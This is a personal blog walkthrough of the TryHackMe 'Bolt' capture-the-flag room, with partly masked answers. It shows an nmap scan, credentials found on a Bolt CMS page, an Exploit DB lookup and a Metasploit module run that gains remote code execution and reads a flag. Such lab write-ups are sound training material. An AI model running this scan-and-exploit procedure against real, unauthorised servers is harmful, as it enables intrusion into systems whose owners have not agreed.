Try Hack Me: Bolt

The skills to be tested and needed to solve this room are: RCE, Metasploit, and just a keen eye.

This room was released today 8/12/2020, and I wanted to try if I can crack it. This is a super easy room. Perfect for anyone who wants to try ctf or hacking.

I also chose to mask part of the answers so you will have to do the steps and see how things work. I don’t want to take away this learning experience from you.

Shoutout to @0x9747 for creating the room. You can access the room at

I was assigned an IP address of

There are 8 tasks to complete the room:

  • What port number has the web server with a CMS running?
    • 8***
  • What is the username we can find in the CMS?
    • b***
  • What is the password we can find for the username?
    • b**********3
  • What version of the CMS is installed on the server?
    • B*** *.*.*
  • There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What is it’s EDB-ID?
    • 4****
  • Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit?
    • exploit/****/******/****_*************_***
  • Set the LHOST, LPORT, RHOSTS, USERNAME, PASSWORD in msfconsole
    • No answer needed
  • Look for the flag.txt inside the machine
    • HTM{w**_******_*****_****_*****?}


  1. Deploy the machine

2. Scan the victim machine for any open ports and services using nmap. nmap -sC -sV -oA Desktop/TryHackMe/Bolt

  • -sC – to scan using the default nmap scripts
  • -sV – to pull version information of open ports found during the scan
  • -oA Desktop/TryHackMe/Bolt – to save the results of the scan to a file named “bounty” and saved in three different formats (normal, XML, and grepable)
Nmap scan result
  • There are 3 open ports, but let’s check both port 80 and 8*** respectively
  • There is nothing to interesting with the page on port 80, it is just the default Apache welcome page.
  • However, port 8*** is setup with Bolt CMS

3. Let’s look around the different pages and links and check if there are useful information we can use to exploit this web server. The following 2 screenshots contain information to exploit the CMS.

  • I don’t know about you guys, but this Jake, the admin needs to be fired ASAP. I mean, who in their right mind would post their username and password on a publicly accessible page??? Good thing this is just for practice and for fun, lol.

4. Browse to and search for bolt in the search field.

Search results for bolt in Exploit DB

5. Open Metasploit. msfconsole

6. Type search bolt to look for the metasploit module that we can use to exploit the machine.

There are two results

7. Type Use 1 to load the second module and use it, and type show options to check what parameters/settings need to be set up

8. Set up the following:

  • set RHOSTS – this is to set up the target machine using its IP address
  • set LHOST 10.2.*.* – this is your attack machine’s IP address
  • set USERNAME b*** – the username we found on the webpage
  • set PASSWORD b**********3 – the password posted on the webpage

9. Type exploit or run to start the exploit against the CMS running on the target machine.

  • Above, we can see that we are inside /home/bolt/public/files directory

10. Look for flag.txt. The flag is in the /home directory

Flag found!

Hope you enjoyed the walk-through. Please share and subscribe to my blog! Mahalos!

Published by lightkunyagami

Leave a comment

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: